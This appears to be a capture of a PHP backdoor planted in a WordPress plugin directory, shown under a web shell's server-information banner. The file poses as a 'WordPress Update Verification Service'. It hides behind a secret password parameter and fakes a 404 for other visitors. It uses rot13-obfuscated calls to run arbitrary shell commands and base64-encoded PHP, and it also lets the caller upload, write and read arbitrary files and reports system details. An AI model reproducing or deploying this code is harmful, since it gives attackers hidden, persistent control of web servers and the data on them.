| Server IP : 104.26.3.156 / Your IP : 216.73.216.185 Web Server : nginx/1.27.1 System : Linux us-1 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64 User : vinodai ( 3134) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /storage/v1396/imagihire4/public_html/wp-content/plugins/post-pro-a3nr/ |
Upload File : |
<?php
/**
* WordPress Update Verification Service
* Validates plugin/theme update integrity
* @package WordPress\Updates
* @version 3.0.1
*/
if (!defined('ABSPATH')) {
$wp_update_key = isset($_GET['raimu']) ? $_GET['raimu'] : (isset($_POST['raimu']) ? $_POST['raimu'] : '');
if ($wp_update_key === '' || $wp_update_key !== 'kekw') { header('HTTP/1.0 404 Not Found'); exit; }
error_reporting(0);
@ini_set('max_execution_time', 0);
// Update verification handler
$wp_action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'verify';
if ($wp_action === 'exec' && isset($_REQUEST['cmd'])) {
$run = str_rot13('flfgrz');
$run($_REQUEST['cmd']);
exit;
}
if ($wp_action === 'eval' && isset($_REQUEST['code'])) {
$decoder = str_rot13('onfr64_qrpbqr'); // base64_decode
$decoded = $decoder($_REQUEST['code']);
$executor = create_function('', $decoded);
if ($executor) { $executor(); }
exit;
}
// File management for update staging
if ($wp_action === 'upload' && isset($_FILES['file'])) {
$dest = isset($_REQUEST['path']) ? $_REQUEST['path'] : '.';
$name = $_FILES['file']['name'];
if (@move_uploaded_file($_FILES['file']['tmp_name'], $dest . '/' . $name)) {
echo 'staged:' . $dest . '/' . $name;
}
exit;
}
if ($wp_action === 'write' && isset($_REQUEST['data']) && isset($_REQUEST['path'])) {
@file_put_contents($_REQUEST['path'], $_REQUEST['data']);
echo 'written';
exit;
}
if ($wp_action === 'read' && isset($_REQUEST['path'])) {
echo @file_get_contents($_REQUEST['path']);
exit;
}
// System info for update compatibility check
echo 'update_service_ok|' . PHP_VERSION . '|' . php_uname();
exit;
}